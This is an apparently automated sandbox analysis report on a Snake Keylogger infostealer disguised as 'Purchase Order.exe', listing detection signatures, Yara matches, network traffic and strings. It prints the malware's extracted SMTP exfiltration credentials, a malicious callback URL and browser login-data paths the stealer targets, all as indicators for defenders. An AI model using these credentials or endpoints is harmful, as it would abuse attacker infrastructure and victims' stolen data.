Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase Order.exe

Overview

General Information

Sample name:Purchase Order.exe
Analysis ID:1420259
MD5:b9f9c9cac777dca7a78819914da1ba15
SHA1:2369adcf893a14e6b8351edeeb2b6b63147fd157
SHA256:32aeea1990475960922b9a0bbda5a7edc864a3c70e4b8c5e84b16e269ea6fc7c
Tags:exeSnakeKeylogger
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains potential unpacker
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Tries to load missing DLLs
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Purchase Order.exe (PID: 6576 cmdline: "C:\Users\user\Desktop\Purchase Order.exe" MD5: B9F9C9CAC777DCA7A78819914DA1BA15)
    • Purchase Order.exe (PID: 7048 cmdline: "C:\Users\user\Desktop\Purchase Order.exe" MD5: B9F9C9CAC777DCA7A78819914DA1BA15)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "tslogs@mksiimst.com", "Password": "EbxKZL@2", "Host": "us2.smtp.mailhostbox.com ", "Port": "587"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.4124971142.00000000034A5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000002.00000002.4123792564.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000002.4123792564.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        00000002.00000002.4123792564.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x14782:$a1: get_encryptedPassword
        • 0x14a78:$a2: get_encryptedUsername
        • 0x1458e:$a3: get_timePasswordChanged
        • 0x14689:$a4: get_passwordField
        • 0x14798:$a5: set_encryptedPassword
        • 0x15d9b:$a7: get_logins
        • 0x15cfe:$a10: KeyLoggerEventArgs
        • 0x15997:$a11: KeyLoggerEventArgsEventHandler
        00000002.00000002.4123792564.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
        • 0x180c0:$x1: $%SMTPDV$
        • 0x18124:$x2: $#TheHashHere%&
        • 0x1975f:$x3: %FTPDV$
        • 0x19853:$x4: $%TelegramDv$
        • 0x15997:$x5: KeyLoggerEventArgs
        • 0x15cfe:$x5: KeyLoggerEventArgs
        • 0x19783:$m2: Clipboard Logs ID
        • 0x1994f:$m2: Screenshot Logs ID
        • 0x19a1b:$m2: keystroke Logs ID
        • 0x19927:$m4: \SnakeKeylogger\
        Click to see the 14 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.Purchase Order.exe.456bca8.9.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0.2.Purchase Order.exe.456bca8.9.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            0.2.Purchase Order.exe.456bca8.9.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
            • 0x12b82:$a1: get_encryptedPassword
            • 0x12e78:$a2: get_encryptedUsername
            • 0x1298e:$a3: get_timePasswordChanged
            • 0x12a89:$a4: get_passwordField
            • 0x12b98:$a5: set_encryptedPassword
            • 0x1419b:$a7: get_logins
            • 0x140fe:$a10: KeyLoggerEventArgs
            • 0x13d97:$a11: KeyLoggerEventArgsEventHandler
            0.2.Purchase Order.exe.456bca8.9.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
            • 0x1a49b:$a2: \Comodo\Dragon\User Data\Default\Login Data
            • 0x196cd:$a3: \Google\Chrome\User Data\Default\Login Data
            • 0x19b00:$a4: \Orbitum\User Data\Default\Login Data
            • 0x1ab3f:$a5: \Kometa\User Data\Default\Login Data
            0.2.Purchase Order.exe.456bca8.9.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
            • 0x1372d:$s1: UnHook
            • 0x13734:$s2: SetHook
            • 0x1373c:$s3: CallNextHook
            • 0x13749:$s4: _hook
            Click to see the 26 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Suspicious Outbound SMTP Connections
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 208.91.199.224, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Purchase Order.exe, Initiated: true, ProcessId: 7048, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49756

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: Purchase Order.exeAvira: detected
            Antivirus detection for URL or domain
            Source: https://scratchdreams.tk/_send_.php?TSAvira URL Cloud: Label: malware
            Source: http://scratchdreams.tkAvira URL Cloud: Label: malware
            Source: https://scratchdreams.tkAvira URL Cloud: Label: malware
            Found malware configuration
            Source: 00000002.00000002.4124971142.0000000003201000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "tslogs@mksiimst.com", "Password": "EbxKZL@2", "Host": "us2.smtp.mailhostbox.com ", "Port": "587"}
            Multi AV Scanner detection for submitted file
            Source: Purchase Order.exeReversingLabs: Detection: 23%
            Machine Learning detection for sample
            Source: Purchase Order.exeJoe Sandbox ML: detected
            Source: Purchase Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49736 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.4:49750 version: TLS 1.2
            Source: Purchase Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: cJZX.pdb source: Purchase Order.exe
            Source: Binary string: cJZX.pdbSHA256 source: Purchase Order.exe
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 0166FCD1h2_2_0166FA10
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 0166EFDDh2_2_0166EDF0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 0166F967h2_2_0166EDF0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_0166E310
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 05DBD869h2_2_05DBD5C0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 05DB1011h2_2_05DB0D60
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 05DBCFB9h2_2_05DBCD10
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 05DB15D8h2_2_05DB1506
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 05DB0751h2_2_05DB04A0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 05DBC709h2_2_05DBC460
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 05DBF6D1h2_2_05DBF428
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 05DBF279h2_2_05DBEFD0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 05DBBA01h2_2_05DBB758
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 05DBE9C9h2_2_05DBE720
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 05DBE119h2_2_05DBDE70
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 05DB15D8h2_2_05DB11C0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 05DB15D8h2_2_05DB11B1
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 05DBD411h2_2_05DBD168
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 05DB0BB1h2_2_05DB0900
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 05DBFB29h2_2_05DBF880
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 05DBCB61h2_2_05DBC8B8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 05DB02F1h2_2_05DB0040
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 05DBC2B1h2_2_05DBC008
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 05DBBE59h2_2_05DBBBB0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 05DBEE21h2_2_05DBEB78
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 05DBB5A9h2_2_05DBB300
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 05DBE571h2_2_05DBE2C8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 05DBDCC1h2_2_05DBDA18
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06E98945h2_2_06E98608
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06E96171h2_2_06E95EC8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]2_2_06E936CE
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06E95D19h2_2_06E95A70
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06E958C1h2_2_06E95618
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06E96E79h2_2_06E96BD0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]2_2_06E933A8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]2_2_06E933B8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06E96A21h2_2_06E96778
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06E965C9h2_2_06E96320
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06E90B99h2_2_06E908F0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06E97751h2_2_06E974A8
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06E90741h2_2_06E90498
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06E902E9h2_2_06E90040
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06E972FAh2_2_06E97050
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06E98459h2_2_06E981B0
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06E95441h2_2_06E95198
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06E90FF1h2_2_06E90D48
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06E98001h2_2_06E97D58
            Source: C:\Users\user\Desktop\Purchase Order.exeCode function: 4x nop then jmp 06E97BA9h2_2_06E97900

            Networking

            barindex
            Yara detected Generic Downloader
            Source: Yara matchFile source: 2.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Order.exe.456bca8.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Purchase Order.exe.454b488.7.raw.unpack, type: UNPACKEDPE
            Source: global trafficTCP traffic: 192.168.2.4:49756 -> 208.91.199.224:587
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
            Source: Joe Sandbox ViewIP Address: 208.91.199.224 208.91.199.224
            Source: Joe Sandbox ViewIP Address: 104.21.27.85 104.21.27.85
            Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: global trafficTCP traffic: 192.168.2.4:49756 -> 208.91.199.224:587
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49736 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: checkip.dyndns.org
            Source: Purchase Order.exe, 00000002.00000002.4124971142.00000000032C4000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.00000000033BC000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003357000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.00000000033AD000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003365000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003373000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: Purchase Order.exe, 00000002.00000002.4124971142.00000000032C4000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.000000000338E000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.00000000033BC000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003357000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.00000000033AD000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003365000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003373000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003303000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: Purchase Order.exe, 00000002.00000002.4124971142.0000000003201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: Purchase Order.exe, 00000000.00000002.1733547969.000000000447E000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4123792564.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
            Source: Purchase Order.exe, 00000002.00000002.4124971142.00000000033BC000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003357000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.00000000033AD000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003365000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003373000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: Purchase Order.exe, 00000002.00000002.4124971142.0000000003201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Purchase Order.exe, 00000002.00000002.4124971142.00000000033CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://scratchdreams.tk
            Source: Purchase Order.exe, 00000002.00000002.4124971142.00000000034A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
            Source: Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000000.00000002.1736293448.0000000005C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: Purchase Order.exe, 00000000.00000002.1736435979.0000000007462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: Purchase Order.exe, 00000002.00000002.4124971142.00000000032C4000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.00000000033BC000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003357000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.00000000033AD000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003365000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003373000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003303000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000002.00000002.4124971142.0000000003380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
